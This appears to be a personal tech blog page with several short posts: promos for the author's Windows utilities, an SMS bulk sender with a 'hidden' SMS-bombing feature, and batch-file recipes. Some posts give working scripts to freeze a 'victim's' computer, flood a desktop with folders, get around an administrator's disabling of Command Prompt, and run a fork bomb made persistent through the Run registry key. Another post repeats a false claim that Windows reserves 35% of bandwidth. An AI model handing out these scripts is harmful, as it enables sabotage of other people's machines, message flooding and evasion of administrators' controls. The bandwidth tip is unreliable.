Posts

Showing posts with the label Technology

Wajeeha Software Set (WSS)

Image
In the era of competition, no body have time enough to navigate or search through directories for desired programs. Wajeeha Software Set (WSS) Allows you to make, manage quick shortcuts of your tools, arrange order and open them when required. Benefits 1. Saves navigational time. 2. Quicker Access (Copy shortcut in Windows Directory, Hit Win+R, Type 'WSS' and of you go.) 3. Quick Management. 4. Quick Arrangement. 5. Backup of tools installed if windows corrupted. (Install exe other than windows directory, paste shortcut in Windows Directory). 6. Source code is module based 1 function that can be used in other applications having same scenario. CLICK HERE TO DOWNLOAD WAJEEHA SOFTWARE SET (WSS)

Send SMS Through PC Via Android Mobile Phone

Image
1. Simbha SMS Marketer To Throw Bulk Messages To Others's Mobile Phones. 2. Throws Bulk Messages To Client Mobile Phones. 3. Requires Android Phone (With Hotspot Ability) (Individual + Industrial usage) 4. Requires GSM Sim (With SMS Package) 5. Simbha SMS Gateway Android Application Is Installed in Android Phone. 6. Then Connected To This Windows App. (Very Easy And Configurable Method) 7. Text File, CSV (",",";"," " Support), Excel, Access, Phone Numbers Data Import Supported. 8. 27 SMS Per Minute. [Depends upon phone and sim provider] 9. Hidden Feature of SMS Bombing (Throwing More Than One Message to Single Number) . 10. Much More....

Freeze Someone's Computer

Image
Step 1: Open your Notepad Step 2: Type in this code @echo off Title You Have Been Hacked! :Loop Start CMD Goto loop Step 3: Save the extension with any name as " .bat " Double Click It, And Let It Work... :) This Will Pop Up CMD Unlimitedly And Finally It Freezes The Victim's Computer.

How To Create A Huge Amount Of Folders On Victims Desktop Screen

Image
Step 1: Open your Notepad Step 2: Type in this code @echo off : top md %random% goto top Step 3: Save the extension with any name as " .bat " Double Click It, And Let It Work... :)

How To Make Windows Provide Full Internet Bandwidth

Image
Just tired of slightly slow internet? Windows uses 35% of your bandwidth which makes your internet slow.Here's how to Get it back.  A nice little tweak for all windows. NOTE: Please don't comment like " can this work in windows 8.1?", "can this work with windows 10?", and those blah, blah. I mean it works with all windows. Microsoft reserve 35% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)  Its one of the o ld stuffs in Windows.  Here's how to get it back: Click Start-->Run-->type "gpedit.msc" without the extension. This opens the group policy editor. Then go to: Go to Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab : "By default, the Packet Sch...

How To Access Command Prompt Disable by Network Administrator

Image
Open Notepad. Type (or Copy) following lines; @echo off : loop set / p _cmd = “% CD %>” % _cmd % goto : loop Save File as .bat extension. One More Method is; Right click in your desktop > new > shortcut > write: C:\Windows\System32\cmd.exe > Finish Now Open Shortcut to open CMD.

Which Design Pattern Violates Which Principle?

Image
S O L I D Factory Factory Method Abstract Factory Singleton Builder Prototype Object Pool Adaptor Bridge Filter Composite Decorator Facade Flyweight Proxy Chain of Responsibility Command Interpreter Iterator Mediator Memento Observer State NULL Object Pattern Strategy Template Method Visitor S: Single Responsibility Principle O: Open Closed Principle L: Liskov Substitution Principle  I: Interface Segregation Principle D:  Dependency Inversion Principle

Wajeeha Quick Google Search

Image
Introduction: Who wants to open browser first then search on Google? This Handy App Helps you in automating Google search. Just Type in what you want to search and hit search. It will automatically search for you. Benefits: Free. Open Source.  (Developed in C#) Easy To Download. Easy To Use. Easy To Manage. With Command Line Support. How to use: Download. Extract. Copy WQGS.exe (Wajeeha Quick Google Search) to Windows Directory. (Mostly C:\Windows\ you can even go directly by typing %Windir%)  Hit Win + R ( Command Line ). In Run, Type WQGS <What You Want to search on Google.> For Example; I want to search "Hello World" Google. Even if you need an interface, just type “WQGS.exe” with or without exe and hit Enter. Interface would appear. Type and hit enter, This is what you get. (In your default browser) You can do it in another way; Go to address bar where your app is and type; ENJOY!!!!! :) SYSTEM REQUIREMENTS: 1. Requires Dot Net Frame Work 4.0 2. Requires Windows...

How To Crash Your Windows System

Image
In Windows, Open up notepad Type %0|%0 Save the file to your desktop as anything.bat Doubleclick the file on your desktop This is known as a ‘fork bomb’. It will open more and more copies of itself, and those copies will open yet more copies. Your computer will be unusable within a couple of seconds after clicking the file and it will crash completely within a minute or two. Once you turn it back on it will be back to normal. Edit: If you want to make it permanent, then add it to the Startup folder or: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run In the registry using RegEdit.exe This will run every time you log in. Hence you'll just get into a cycle of iterating crash, reboot, crash, reboot etc. Unless the person knows how to get out of it.